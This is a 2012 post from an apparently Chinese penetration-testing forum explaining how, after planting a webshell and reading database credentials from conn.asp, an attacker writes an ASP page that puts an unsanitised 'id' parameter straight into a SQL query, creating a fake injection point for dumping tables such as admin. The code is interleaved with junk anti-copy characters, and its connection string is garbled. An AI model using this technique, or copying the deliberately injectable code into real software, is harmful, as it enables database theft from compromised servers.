中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
. z& L4 g6 f; p/ {+ p* \ASP/Visual Basic代码
& _$ h+ l9 Q. E/ h& J* g  {<!--#include file="xx.asp"-->   
; x0 {  |- C1 _) P9 j/ V; z8 t( a8 o<%    & f8 ~/ v3 g3 @
set rs=server.createobject("ADODB.recordset")   
9 E6 ?/ F6 y* L( J3 i  aid = request("id")    9 U5 Q/ @) E- d- R2 _
strSQL = "select * from admin where id=" & id   
) X+ Q. l* ^& D1 Y8 Ers.open strSQL,conn,1,3   
1 }0 [/ h( ?' e  K; X1 Ars.close    7 C4 @8 E" E/ m3 ~* w0 M
%>  
) H+ h# r) G( H" a; Q把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!' V$ {/ l$ Q4 z2 U# ^, i
然后就要构造一个连接数据库的文件了,代码如下:) \, w5 ]0 v( u* b; b
ASP/Visual Basic代码
* j3 U3 A8 g5 J  _<%            0 p, r4 p4 Y! ^2 u7 c( F- K
strSQLServerName = "000.000.000.000"     '服务器名称或地址   
% |' ]9 m! W! P0 @0 e: @8 \strSQLDBUserName = "sqlname"         '数据库帐号   
( Z& D3 x& V( j' XstrSQLDBPassword = "sqlpass"         '数据库密码   
, {& {/ V% R4 w* {+ d% pstrSQLDBName = "sqldataname"           '数据库名称    " M' B8 z: c# y4 t& a2 u
Set conn = Server.CreateObject("ADODB.Connection")    7 x1 w1 w# {( x& J- y% P% |$ T
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   
1 p5 Q# z: ~& p9 p; L, K! P& uconn.open strCon    " T. V& ~( k0 a" K2 V* N# `
%>  
! W/ y! n' L' i$ H3 `这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
) Q+ I, v; Z9 s8 H




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2